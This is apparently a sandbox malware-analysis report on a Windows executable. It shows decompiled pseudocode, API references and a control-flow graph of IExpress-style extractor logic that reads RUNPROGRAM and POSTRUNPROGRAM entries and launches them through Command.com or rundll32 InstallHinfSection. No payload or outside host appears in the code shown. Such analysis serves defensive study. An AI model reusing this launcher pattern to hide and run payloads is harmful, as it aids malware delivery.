                                                                        												if(_t79 == 0) {
                                                                        													L61:
                                                                        													LocalFree(_t151);
                                                                        													goto L62;
                                                                        												}
                                                                        												L58:
                                                                        												LocalFree(_t151);
                                                                        												_t127 = _t127 + 1;
                                                                        												_v396 = _t127;
                                                                        												__eflags = _t127 - 2;
                                                                        												if(_t127 >= 2) {
                                                                        													_t155 = 1;
                                                                        													__eflags = 1;
                                                                        													L69:
                                                                        													__eflags =  *0xa38580;
                                                                        													if( *0xa38580 != 0) {
                                                                        														E00A32267();
                                                                        													}
                                                                        													_t77 = _t155;
                                                                        													goto L63;
                                                                        												}
                                                                        												_t153 = _v392;
                                                                        												_t149 = _v388;
                                                                        												continue;
                                                                        											}
                                                                        											L38:
                                                                        											__eflags =  *0xa38180;
                                                                        											if( *0xa38180 == 0) {
                                                                        												_t146 = 0x4c7;
                                                                        												E00A344B9(0, 0x4c7, 0, 0, 0x10, 0);
                                                                        												LocalFree(_v424);
                                                                        												 *0xa39124 = 0x8007042b;
                                                                        												goto L62;
                                                                        											}
                                                                        											__eflags = _t157;
                                                                        											if(_t157 == 0) {
                                                                        												goto L57;
                                                                        											}
                                                                        											__eflags =  *0xa39a34 & 0x00000004;
                                                                        											if(__eflags == 0) {
                                                                        												goto L57;
                                                                        											}
                                                                        											_t129 = E00A36495(_t127, _t132, _t157, __eflags);
                                                                        											__eflags = _t129;
                                                                        											if(_t129 == 0) {
                                                                        												_t146 = 0x4c8;
                                                                        												E00A344B9(0, 0x4c8, "advpack.dll", 0, 0x10, 0);
                                                                        												L65:
                                                                        												LocalFree(_v408);
                                                                        												 *0xa39124 = E00A36285();
                                                                        												goto L62;
                                                                        											}
                                                                        											_t146 = GetProcAddress(_t129, "DoInfInstall");
                                                                        											_v404 = _t146;
                                                                        											__eflags = _t146;
                                                                        											if(_t146 == 0) {
                                                                        												_t146 = 0x4c9;
                                                                        												__eflags = 0;
                                                                        												E00A344B9(0, 0x4c9, "DoInfInstall", 0, 0x10, 0);
                                                                        												FreeLibrary(_t129);
                                                                        												goto L65;
                                                                        											}
                                                                        											__eflags =  *0xa38a30;
                                                                        											_t151 = _v408;
                                                                        											_v384 = 0;
                                                                        											_v368 =  &_v280;
                                                                        											_t96 =  *0xa39a40; // 0x3
                                                                        											_v364 = _t96;
                                                                        											_t97 =  *0xa38a38 & 0x0000ffff;
                                                                        											_v380 = 0xa39154;
                                                                        											_v376 = _t151;
                                                                        											_v372 = 0xa391e4;
                                                                        											_v360 = _t97;
                                                                        											if( *0xa38a30 != 0) {
                                                                        												_t97 = _t97 | 0x00010000;
                                                                        												__eflags = _t97;
                                                                        												_v360 = _t97;
                                                                        											}
                                                                        											_t144 =  *0xa39a34; // 0x1
                                                                        											__eflags = _t144 & 0x00000008;
                                                                        											if((_t144 & 0x00000008) != 0) {
                                                                        												_t97 = _t97 | 0x00020000;
                                                                        												__eflags = _t97;
                                                                        												_v360 = _t97;
                                                                        											}
                                                                        											__eflags = _t144 & 0x00000010;
                                                                        											if((_t144 & 0x00000010) != 0) {
                                                                        												_t97 = _t97 | 0x00040000;
                                                                        												__eflags = _t97;
                                                                        												_v360 = _t97;
                                                                        											}
                                                                        											_t145 =  *0xa38d48; // 0x0
                                                                        											__eflags = _t145 & 0x00000040;
                                                                        											if((_t145 & 0x00000040) != 0) {
                                                                        												_t97 = _t97 | 0x00080000;
                                                                        												__eflags = _t97;
                                                                        												_v360 = _t97;
                                                                        											}
                                                                        											__eflags = _t145;
                                                                        											if(_t145 < 0) {
                                                                        												_t104 = _t97 | 0x00100000;
                                                                        												__eflags = _t104;
                                                                        												_v360 = _t104;
                                                                        											}
                                                                        											_t98 =  *0xa39a38; // 0x0
                                                                        											_v356 = _t98;
                                                                        											_t130 = _t146;
                                                                        											 *0xa3a288( &_v384);
                                                                        											_t101 = _v404();
                                                                        											__eflags = _t164 - _t164;
                                                                        											if(_t164 != _t164) {
                                                                        												_t130 = 4;
                                                                        												asm("int 0x29");
                                                                        											}
                                                                        											 *0xa39124 = _t101;
                                                                        											_push(_t129);
                                                                        											__eflags = _t101;
                                                                        											if(_t101 < 0) {
                                                                        												FreeLibrary();
                                                                        												goto L61;
                                                                        											} else {
                                                                        												FreeLibrary();
                                                                        												_t127 = _v400;
                                                                        												goto L58;
                                                                        											}
                                                                        										}
                                                                        										__eflags =  *0xa39a40 - 1; // 0x3
                                                                        										if(__eflags == 0) {
                                                                        											goto L37;
                                                                        										}
                                                                        										__eflags =  *0xa38a20;
                                                                        										if( *0xa38a20 == 0) {
                                                                        											goto L37;
                                                                        										}
                                                                        										__eflags = _t157;
                                                                        										if(_t157 != 0) {
                                                                        											goto L38;
                                                                        										}
                                                                        										_v388 = 1;
                                                                        										E00A3202A(_t146); // executed
                                                                        										goto L37;
                                                                        									}
                                                                        									_t146 =  &_v280;
                                                                        									_t108 = E00A3468F("POSTRUNPROGRAM",  &_v280, 0x104);
                                                                        									__eflags = _t108;
                                                                        									if(_t108 == 0) {
                                                                        										goto L25;
                                                                        									}
                                                                        									__eflags =  *0xa38c42;
                                                                        									if( *0xa38c42 != 0) {
                                                                        										goto L69;
                                                                        									}
                                                                        									_t112 = CompareStringA(0x7f, 1,  &_v280, 0xffffffff, "<None>", 0xffffffff);
                                                                        									__eflags = _t112 == 0;
                                                                        									if(_t112 == 0) {
                                                                        										goto L69;
                                                                        									}
                                                                        									goto L31;
                                                                        								}
                                                                        								_t118 =  *0xa38a38; // 0x0
                                                                        								if(_t118 == 0) {
                                                                        									L23:
                                                                        									if(_t153 != 0) {
                                                                        										goto L31;
                                                                        									}
                                                                        									_t146 =  &_v276;
                                                                        									if(E00A3468F("RUNPROGRAM",  &_v276, 0x104) != 0) {
                                                                        										goto L27;
                                                                        									}
                                                                        									goto L25;
                                                                        								}
                                                                        								if((_t118 & 0x00000001) == 0) {
                                                                        									__eflags = _t118 & 0x00000002;
                                                                        									if((_t118 & 0x00000002) == 0) {
                                                                        										goto L62;
                                                                        									}
                                                                        									_t140 = "USRQCMD";
                                                                        									L20:
                                                                        									_t146 =  &_v276;
                                                                        									if(E00A3468F(_t140,  &_v276, 0x104) == 0) {
                                                                        										goto L25;
                                                                        									}
                                                                        									if(CompareStringA(0x7f, 1,  &_v276, 0xffffffff, "<None>", 0xffffffff) - 2 != 0xfffffffe) {
                                                                        										_t153 = 1;
                                                                        										_v388 = 1;
                                                                        									}
                                                                        									goto L23;
                                                                        								}
                                                                        								_t140 = "ADMQCMD";
                                                                        								goto L20;
                                                                        							}
                                                                        						}
                                                                        						L26:
                                                                        						_push(_t130);
                                                                        						_t146 = 0x104;
                                                                        						E00A31781( &_v276, 0x104, _t130, 0xa38c42);
                                                                        						goto L27;
                                                                        					}
                                                                        				}
                                                                        				_t130 = "REBOOT";
                                                                        				_t125 = E00A3468F(_t130, 0xa39a2c, 4);
                                                                        				if(_t125 == 0 || _t125 > 4) {
                                                                        					goto L25;
                                                                        				} else {
                                                                        					goto L3;
                                                                        				}
                                                                        			}





























































                                                                        0x00a33baa
                                                                        0x00a33bb0
                                                                        0x00a33bb7
                                                                        0x00a33bc0
                                                                        0x00a33bc2
                                                                        0x00a33bc9
                                                                        0x00a33bcb
                                                                        0x00a33bcf
                                                                        0x00a33bd3
                                                                        0x00a33bd9
                                                                        0x00a33bfd
                                                                        0x00a33bfd
                                                                        0x00a33bff
                                                                        0x00a33c03
                                                                        0x00a33c03
                                                                        0x00a33c11
                                                                        0x00a33c16
                                                                        0x00a33c19
                                                                        0x00a33c28
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a33c30
                                                                        0x00a33c39
                                                                        0x00a33c40
                                                                        0x00a33d13
                                                                        0x00a33d15
                                                                        0x00a33d21
                                                                        0x00a33d26
                                                                        0x00000000
                                                                        0x00a33c4f
                                                                        0x00a33c56
                                                                        0x00a33c60
                                                                        0x00a33c65
                                                                        0x00a33c77
                                                                        0x00a33c78
                                                                        0x00a33c7c
                                                                        0x00a33c7e
                                                                        0x00a33c82
                                                                        0x00a33c82
                                                                        0x00000000
                                                                        0x00a33c7c
                                                                        0x00a33c67
                                                                        0x00a33c69
                                                                        0x00a33c6d
                                                                        0x00000000
                                                                        0x00a33c58
                                                                        0x00a33c58
                                                                        0x00a33c6e
                                                                        0x00a33c6e
                                                                        0x00a33c87
                                                                        0x00a33c89
                                                                        0x00a33d4d
                                                                        0x00a33d4f
                                                                        0x00a33d50
                                                                        0x00a33d52
                                                                        0x00a33d9e
                                                                        0x00a33da8
                                                                        0x00a33daf
                                                                        0x00a33db4
                                                                        0x00a33db6
                                                                        0x00a33f4d
                                                                        0x00a33f4d
                                                                        0x00a33f4f
                                                                        0x00a33f56
                                                                        0x00a33f57
                                                                        0x00a33f58
                                                                        0x00a33f63
                                                                        0x00a33f63
                                                                        0x00a33dbc
                                                                        0x00a33dc0
                                                                        0x00a33dc2
                                                                        0x00a33de6
                                                                        0x00a33de6
                                                                        0x00a33de8
                                                                        0x00a33f0b
                                                                        0x00a33f0b
                                                                        0x00a33f0f
                                                                        0x00a33f13
                                                                        0x00a33f15
                                                                        0x00a33f1a
                                                                        0x00a33f1c
                                                                        0x00a33f46
                                                                        0x00a33f47
                                                                        0x00000000
                                                                        0x00a33f47
                                                                        0x00a33f1e
                                                                        0x00a33f1f
                                                                        0x00a33f25
                                                                        0x00a33f26
                                                                        0x00a33f2a
                                                                        0x00a33f2d
                                                                        0x00a33fd9
                                                                        0x00a33fd9
                                                                        0x00a33fda
                                                                        0x00a33fda
                                                                        0x00a33fe1
                                                                        0x00a33fe3
                                                                        0x00a33fe3
                                                                        0x00a33fe8
                                                                        0x00000000
                                                                        0x00a33fe8
                                                                        0x00a33f33
                                                                        0x00a33f37
                                                                        0x00000000
                                                                        0x00a33f37
                                                                        0x00a33dee
                                                                        0x00a33dee
                                                                        0x00a33df5
                                                                        0x00a33fad
                                                                        0x00a33fb9
                                                                        0x00a33fc2
                                                                        0x00a33fc8
                                                                        0x00000000
                                                                        0x00a33fc8
                                                                        0x00a33dfb
                                                                        0x00a33dfd
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a33e03
                                                                        0x00a33e0a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a33e15
                                                                        0x00a33e17
                                                                        0x00a33e19
                                                                        0x00a33f94
                                                                        0x00a33fa4
                                                                        0x00a33f7c
                                                                        0x00a33f80
                                                                        0x00a33f8b
                                                                        0x00000000
                                                                        0x00a33f8b
                                                                        0x00a33e2c
                                                                        0x00a33e30
                                                                        0x00a33e34
                                                                        0x00a33e36
                                                                        0x00a33f69
                                                                        0x00a33f6e
                                                                        0x00a33f70
                                                                        0x00a33f76
                                                                        0x00000000
                                                                        0x00a33f76
                                                                        0x00a33e3c
                                                                        0x00a33e43
                                                                        0x00a33e47
                                                                        0x00a33e52
                                                                        0x00a33e56
                                                                        0x00a33e5c
                                                                        0x00a33e61
                                                                        0x00a33e68
                                                                        0x00a33e70
                                                                        0x00a33e74
                                                                        0x00a33e7c
                                                                        0x00a33e80
                                                                        0x00a33e82
                                                                        0x00a33e82
                                                                        0x00a33e87
                                                                        0x00a33e87
                                                                        0x00a33e8b
                                                                        0x00a33e91
                                                                        0x00a33e94
                                                                        0x00a33e96
                                                                        0x00a33e96
                                                                        0x00a33e9b
                                                                        0x00a33e9b
                                                                        0x00a33e9f
                                                                        0x00a33ea2
                                                                        0x00a33ea4
                                                                        0x00a33ea4
                                                                        0x00a33ea9
                                                                        0x00a33ea9
                                                                        0x00a33ead
                                                                        0x00a33eb3
                                                                        0x00a33eb6
                                                                        0x00a33eb8
                                                                        0x00a33eb8
                                                                        0x00a33ebd
                                                                        0x00a33ebd
                                                                        0x00a33ec1
                                                                        0x00a33ec3
                                                                        0x00a33ec5
                                                                        0x00a33ec5
                                                                        0x00a33eca
                                                                        0x00a33eca
                                                                        0x00a33ece
                                                                        0x00a33ed5
                                                                        0x00a33ed9
                                                                        0x00a33ee0
                                                                        0x00a33ee6
                                                                        0x00a33eea
                                                                        0x00a33eec
                                                                        0x00a33eee
                                                                        0x00a33ef3
                                                                        0x00a33ef3
                                                                        0x00a33ef5
                                                                        0x00a33efa
                                                                        0x00a33efb
                                                                        0x00a33efd
                                                                        0x00a33f40
                                                                        0x00000000
                                                                        0x00a33eff
                                                                        0x00a33eff
                                                                        0x00a33f05
                                                                        0x00000000
                                                                        0x00a33f05
                                                                        0x00a33efd
                                                                        0x00a33dc7
                                                                        0x00a33dce
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a33dd0
                                                                        0x00a33dd7
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a33dd9
                                                                        0x00a33ddb
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a33ddd
                                                                        0x00a33de1
                                                                        0x00000000
                                                                        0x00a33de1
                                                                        0x00a33d59
                                                                        0x00a33d65
                                                                        0x00a33d6a
                                                                        0x00a33d6c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a33d6e
                                                                        0x00a33d75
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a33d8f
                                                                        0x00a33d96
                                                                        0x00a33d98
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a33d98
                                                                        0x00a33c8f
                                                                        0x00a33c98
                                                                        0x00a33cf1
                                                                        0x00a33cf3
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a33cfe
                                                                        0x00a33d11
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a33d11
                                                                        0x00a33c9c
                                                                        0x00a33ca5
                                                                        0x00a33ca7
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a33cad
                                                                        0x00a33cb2
                                                                        0x00a33cb7
                                                                        0x00a33cc5
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a33ce8
                                                                        0x00a33cec
                                                                        0x00a33ced
                                                                        0x00a33ced
                                                                        0x00000000
                                                                        0x00a33ce8
                                                                        0x00a33c9e
                                                                        0x00000000
                                                                        0x00a33c9e
                                                                        0x00a33c56
                                                                        0x00a33d35
                                                                        0x00a33d35
                                                                        0x00a33d3c
                                                                        0x00a33d48
                                                                        0x00000000
                                                                        0x00a33d48
                                                                        0x00a33c03
                                                                        0x00a33be2
                                                                        0x00a33be7
                                                                        0x00a33bee
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000

                                                                        APIs
                                                                        • memset.MSVCRT ref: 00A33C11
                                                                        • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,00000004), ref: 00A33CDC
                                                                          • Part of subcall function 00A3468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A346A0
                                                                          • Part of subcall function 00A3468F: SizeofResource.KERNEL32(00000000,00000000,?,00A32D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A346A9
                                                                          • Part of subcall function 00A3468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A346C3
                                                                          • Part of subcall function 00A3468F: LoadResource.KERNEL32(00000000,00000000,?,00A32D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A346CC
                                                                          • Part of subcall function 00A3468F: LockResource.KERNEL32(00000000,?,00A32D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A346D3
                                                                          • Part of subcall function 00A3468F: memcpy_s.MSVCRT ref: 00A346E5
                                                                          • Part of subcall function 00A3468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00A346EF
                                                                        • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,?,00A38C42), ref: 00A33D8F
                                                                        • GetProcAddress.KERNEL32(00000000,DoInfInstall), ref: 00A33E26
                                                                        • FreeLibrary.KERNEL32(00000000,?,00A38C42), ref: 00A33EFF
                                                                        • LocalFree.KERNEL32(?,?,?,?,00A38C42), ref: 00A33F1F
                                                                        • FreeLibrary.KERNEL32(00000000,?,00A38C42), ref: 00A33F40
                                                                        • LocalFree.KERNEL32(?,?,?,?,00A38C42), ref: 00A33F47
                                                                        • FreeLibrary.KERNEL32(00000000,DoInfInstall,00000000,00000010,00000000,?,00A38C42), ref: 00A33F76
                                                                        • LocalFree.KERNEL32(?,advpack.dll,00000000,00000010,00000000,?,?,?,00A38C42), ref: 00A33F80
                                                                        • LocalFree.KERNEL32(?,00000000,00000000,00000010,00000000,?,?,?,00A38C42), ref: 00A33FC2
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.396615809.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                        • Associated: 00000000.00000002.396538956.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396668507.0000000000A38000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Free$Resource$Local$Library$CompareFindString$AddressLoadLockProcSizeofmemcpy_smemset
                                                                        • String ID: <None>$ADMQCMD$C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\$D$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$USRQCMD$advpack.dll$zhiga
                                                                        • API String ID: 1032054927-2225721525
                                                                        • Opcode ID: a5422213361df776cc312e7b71a14ab0c3ba8605bd8effa4e10c3accfa7a3bd0
                                                                        • Instruction ID: 32d1d98a214ac547381838c3153e5d06d2e057e688c1518aa3fd027624c6bfdf
                                                                        • Opcode Fuzzy Hash: a5422213361df776cc312e7b71a14ab0c3ba8605bd8effa4e10c3accfa7a3bd0
                                                                        • Instruction Fuzzy Hash: 1CB1037290C3019FDB24DF648D46B6B76E4EB85740F104A2DFA85D61A0DB74CA46CB92
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 141 a31ae8-a31b2c call a31680 144 a31b3b-a31b40 141->144 145 a31b2e-a31b39 141->145 146 a31b46-a31b61 call a31a84 144->146 145->146 149 a31b63-a31b65 146->149 150 a31b9f-a31bc2 call a31781 call a3658a 146->150 151 a31b68-a31b6d 149->151 157 a31bc7-a31bd3 call a366c8 150->157 151->151 153 a31b6f-a31b74 151->153 153->150 156 a31b76-a31b7b 153->156 158 a31b83-a31b86 156->158 159 a31b7d-a31b81 156->159 165 a31d73-a31d7f call a366c8 157->165 166 a31bd9-a31bf1 CompareStringA 157->166 158->150 162 a31b88-a31b8a 158->162 159->158 161 a31b8c-a31b9d call a31680 159->161 161->157 162->150 162->161 175 a31d81-a31d99 CompareStringA 165->175 176 a31df8-a31e09 LocalAlloc 165->176 166->165 168 a31bf7-a31c07 GetFileAttributesA 166->168 170 a31d53-a31d5e 168->170 171 a31c0d-a31c15 168->171 173 a31d64-a31d6e call a344b9 170->173 171->170 174 a31c1b-a31c33 call a31a84 171->174 187 a31e94-a31ea4 call a36ce0 173->187 189 a31c50-a31c61 LocalAlloc 174->189 190 a31c35-a31c38 174->190 175->176 181 a31d9b-a31da2 175->181 178 a31dd4-a31ddf 176->178 179 a31e0b-a31e1b GetFileAttributesA 176->179 178->173 183 a31e67-a31e73 call a31680 179->183 184 a31e1d-a31e1f 179->184 186 a31da5-a31daa 181->186 193 a31e78-a31e84 call a32aac 183->193 184->183 188 a31e21-a31e3e call a31781 184->188 186->186 191 a31dac-a31db4 186->191 188->193 210 a31e40-a31e43 188->210 189->178 199 a31c67-a31c72 189->199 196 a31c40-a31c4b call a31a84 190->196 197 a31c3a 190->197 198 a31db7-a31dbc 191->198 209 a31e89-a31e92 193->209 196->189 197->196 198->198 206 a31dbe-a31dd2 LocalAlloc 198->206 200 a31c74 199->200 201 a31c79-a31cc0 GetPrivateProfileIntA GetPrivateProfileStringA 199->201 200->201 207 a31cc2-a31ccc 201->207 208 a31cf8-a31d07 201->208 206->178 211 a31de1-a31df3 call a3171e 206->211 213 a31cd3-a31cf3 call a31680 * 2 207->213 214 a31cce 207->214 216 a31d23 208->216 217 a31d09-a31d21 GetShortPathNameA 208->217 209->187 210->193 215 a31e45-a31e65 call a316b3 * 2 210->215 211->209 213->209 214->213 215->193 221 a31d28-a31d2b 216->221 217->221 224 a31d32-a31d4e call a3171e 221->224 225 a31d2d 221->225 224->209 225->224
                                                                        C-Code - Quality: 82%
                                                                        			E00A31AE8(long __ecx, CHAR** _a4, int* _a8) {
                                                                        				signed int _v8;
                                                                        				char _v268;
                                                                        				char _v527;
                                                                        				char _v528;
                                                                        				char _v1552;
                                                                        				CHAR* _v1556;
                                                                        				int* _v1560;
                                                                        				CHAR** _v1564;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t48;
                                                                        				CHAR* _t53;
                                                                        				CHAR* _t54;
                                                                        				char* _t57;
                                                                        				char* _t58;
                                                                        				CHAR* _t60;
                                                                        				void* _t62;
                                                                        				signed char _t65;
                                                                        				intOrPtr _t76;
                                                                        				intOrPtr _t77;
                                                                        				unsigned int _t85;
                                                                        				CHAR* _t90;
                                                                        				CHAR* _t92;
                                                                        				char _t105;
                                                                        				char _t106;
                                                                        				CHAR** _t111;
                                                                        				CHAR* _t115;
                                                                        				intOrPtr* _t125;
                                                                        				void* _t126;
                                                                        				CHAR* _t132;
                                                                        				CHAR* _t135;
                                                                        				void* _t138;
                                                                        				void* _t139;
                                                                        				void* _t145;
                                                                        				intOrPtr* _t146;
                                                                        				char* _t148;
                                                                        				CHAR* _t151;
                                                                        				void* _t152;
                                                                        				CHAR* _t155;
                                                                        				CHAR* _t156;
                                                                        				void* _t157;
                                                                        				signed int _t158;
                                                                        
                                                                        				_t48 =  *0xa38004; // 0xb6b6972c
                                                                        				_v8 = _t48 ^ _t158;
                                                                        				_t108 = __ecx;
                                                                        				_v1564 = _a4;
                                                                        				_v1560 = _a8;
                                                                        				E00A31680( &_v528, 0x104, __ecx);
                                                                        				if(_v528 != 0x22) {
                                                                        					_t135 = " ";
                                                                        					_t53 =  &_v528;
                                                                        				} else {
                                                                        					_t135 = "\"";
                                                                        					_t53 =  &_v527;
                                                                        				}
                                                                        				_t111 =  &_v1556;
                                                                        				_v1556 = _t53;
                                                                        				_t54 = E00A31A84(_t111, _t135);
                                                                        				_t156 = _v1556;
                                                                        				_t151 = _t54;
                                                                        				if(_t156 == 0) {
                                                                        					L12:
                                                                        					_push(_t111);
                                                                        					E00A31781( &_v268, 0x104, _t111, "C:\Users\FRONTD~1\AppData\Local\Temp\IXP000.TMP\");
                                                                        					E00A3658A( &_v268, 0x104, _t156);
                                                                        					goto L13;
                                                                        				} else {
                                                                        					_t132 = _t156;
                                                                        					_t148 =  &(_t132[1]);
                                                                        					do {
                                                                        						_t105 =  *_t132;
                                                                        						_t132 =  &(_t132[1]);
                                                                        					} while (_t105 != 0);
                                                                        					_t111 = _t132 - _t148;
                                                                        					if(_t111 < 3) {
                                                                        						goto L12;
                                                                        					}
                                                                        					_t106 = _t156[1];
                                                                        					if(_t106 != 0x3a || _t156[2] != 0x5c) {
                                                                        						if( *_t156 != 0x5c || _t106 != 0x5c) {
                                                                        							goto L12;
                                                                        						} else {
                                                                        							goto L11;
                                                                        						}
                                                                        					} else {
                                                                        						L11:
                                                                        						E00A31680( &_v268, 0x104, _t156);
                                                                        						L13:
                                                                        						_t138 = 0x2e;
                                                                        						_t57 = E00A366C8(_t156, _t138);
                                                                        						if(_t57 == 0 || CompareStringA(0x7f, 1, _t57, 0xffffffff, ".INF", 0xffffffff) != 0) {
                                                                        							_t139 = 0x2e;
                                                                        							_t115 = _t156;
                                                                        							_t58 = E00A366C8(_t115, _t139);
                                                                        							if(_t58 == 0 || CompareStringA(0x7f, 1, _t58, 0xffffffff, ".BAT", 0xffffffff) != 0) {
                                                                        								_t156 = LocalAlloc(0x40, 0x400);
                                                                        								if(_t156 == 0) {
                                                                        									goto L43;
                                                                        								}
                                                                        								_t65 = GetFileAttributesA( &_v268); // executed
                                                                        								if(_t65 == 0xffffffff || (_t65 & 0x00000010) != 0) {
                                                                        									E00A31680( &_v1552, 0x400, _t108);
                                                                        								} else {
                                                                        									_push(_t115);
                                                                        									_t108 = 0x400;
                                                                        									E00A31781( &_v1552, 0x400, _t115,  &_v268);
                                                                        									if(_t151 != 0 &&  *_t151 != 0) {
                                                                        										E00A316B3( &_v1552, 0x400, " ");
                                                                        										E00A316B3( &_v1552, 0x400, _t151);
                                                                        									}
                                                                        								}
                                                                        								_t140 = _t156;
                                                                        								 *_t156 = 0;
                                                                        								E00A32AAC( &_v1552, _t156, _t156);
                                                                        								goto L53;
                                                                        							} else {
                                                                        								_t108 = "Command.com /c %s";
                                                                        								_t125 = "Command.com /c %s";
                                                                        								_t145 = _t125 + 1;
                                                                        								do {
                                                                        									_t76 =  *_t125;
                                                                        									_t125 = _t125 + 1;
                                                                        								} while (_t76 != 0);
                                                                        								_t126 = _t125 - _t145;
                                                                        								_t146 =  &_v268;
                                                                        								_t157 = _t146 + 1;
                                                                        								do {
                                                                        									_t77 =  *_t146;
                                                                        									_t146 = _t146 + 1;
                                                                        								} while (_t77 != 0);
                                                                        								_t140 = _t146 - _t157;
                                                                        								_t154 = _t126 + 8 + _t146 - _t157;
                                                                        								_t156 = LocalAlloc(0x40, _t126 + 8 + _t146 - _t157);
                                                                        								if(_t156 != 0) {
                                                                        									E00A3171E(_t156, _t154, "Command.com /c %s",  &_v268);
                                                                        									goto L53;
                                                                        								}
                                                                        								goto L43;
                                                                        							}
                                                                        						} else {
                                                                        							_t85 = GetFileAttributesA( &_v268);
                                                                        							if(_t85 == 0xffffffff || ( !(_t85 >> 4) & 0x00000001) == 0) {
                                                                        								_t140 = 0x525;
                                                                        								_push(0);
                                                                        								_push(0x10);
                                                                        								_push(0);
                                                                        								_t60 =  &_v268;
                                                                        								goto L35;
                                                                        							} else {
                                                                        								_t140 = "[";
                                                                        								_v1556 = _t151;
                                                                        								_t90 = E00A31A84( &_v1556, "[");
                                                                        								if(_t90 != 0) {
                                                                        									if( *_t90 != 0) {
                                                                        										_v1556 = _t90;
                                                                        									}
                                                                        									_t140 = "]";
                                                                        									E00A31A84( &_v1556, "]");
                                                                        								}
                                                                        								_t156 = LocalAlloc(0x40, 0x200);
                                                                        								if(_t156 == 0) {
                                                                        									L43:
                                                                        									_t60 = 0;
                                                                        									_t140 = 0x4b5;
                                                                        									_push(0);
                                                                        									_push(0x10);
                                                                        									_push(0);
                                                                        									L35:
                                                                        									_push(_t60);
                                                                        									E00A344B9(0, _t140);
                                                                        									_t62 = 0;
                                                                        									goto L54;
                                                                        								} else {
                                                                        									_t155 = _v1556;
                                                                        									_t92 = _t155;
                                                                        									if( *_t155 == 0) {
                                                                        										_t92 = "DefaultInstall";
                                                                        									}
                                                                        									 *0xa39120 = GetPrivateProfileIntA(_t92, "Reboot", 0,  &_v268);
                                                                        									 *_v1560 = 1;
                                                                        									if(GetPrivateProfileStringA("Version", "AdvancedINF", 0xa31140, _t156, 8,  &_v268) == 0) {
                                                                        										 *0xa39a34 =  *0xa39a34 & 0xfffffffb;
                                                                        										if( *0xa39a40 != 0) {
                                                                        											_t108 = "setupapi.dll";
                                                                        										} else {
                                                                        											_t108 = "setupx.dll";
                                                                        											GetShortPathNameA( &_v268,  &_v268, 0x104);
                                                                        										}
                                                                        										if( *_t155 == 0) {
                                                                        											_t155 = "DefaultInstall";
                                                                        										}
                                                                        										_push( &_v268);
                                                                        										_push(_t155);
                                                                        										E00A3171E(_t156, 0x200, "rundll32.exe %s,InstallHinfSection %s 128 %s", _t108);
                                                                        									} else {
                                                                        										 *0xa39a34 =  *0xa39a34 | 0x00000004;
                                                                        										if( *_t155 == 0) {
                                                                        											_t155 = "DefaultInstall";
                                                                        										}
                                                                        										E00A31680(_t108, 0x104, _t155);
                                                                        										_t140 = 0x200;
                                                                        										E00A31680(_t156, 0x200,  &_v268);
                                                                        									}
                                                                        									L53:
                                                                        									_t62 = 1;
                                                                        									 *_v1564 = _t156;
                                                                        									L54:
                                                                        									_pop(_t152);
                                                                        									return E00A36CE0(_t62, _t108, _v8 ^ _t158, _t140, _t152, _t156);
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        			}














































                                                                        0x00a31af3
                                                                        0x00a31afa
                                                                        0x00a31b07
                                                                        0x00a31b09
                                                                        0x00a31b1a
                                                                        0x00a31b20
                                                                        0x00a31b2c
                                                                        0x00a31b3b
                                                                        0x00a31b40
                                                                        0x00a31b2e
                                                                        0x00a31b2e
                                                                        0x00a31b33
                                                                        0x00a31b33
                                                                        0x00a31b46
                                                                        0x00a31b4c
                                                                        0x00a31b52
                                                                        0x00a31b57
                                                                        0x00a31b5d
                                                                        0x00a31b61
                                                                        0x00a31b9f
                                                                        0x00a31b9f
                                                                        0x00a31bb1
                                                                        0x00a31bc2
                                                                        0x00000000
                                                                        0x00a31b63
                                                                        0x00a31b63
                                                                        0x00a31b65
                                                                        0x00a31b68
                                                                        0x00a31b68
                                                                        0x00a31b6a
                                                                        0x00a31b6b
                                                                        0x00a31b6f
                                                                        0x00a31b74
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a31b76
                                                                        0x00a31b7b
                                                                        0x00a31b86
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
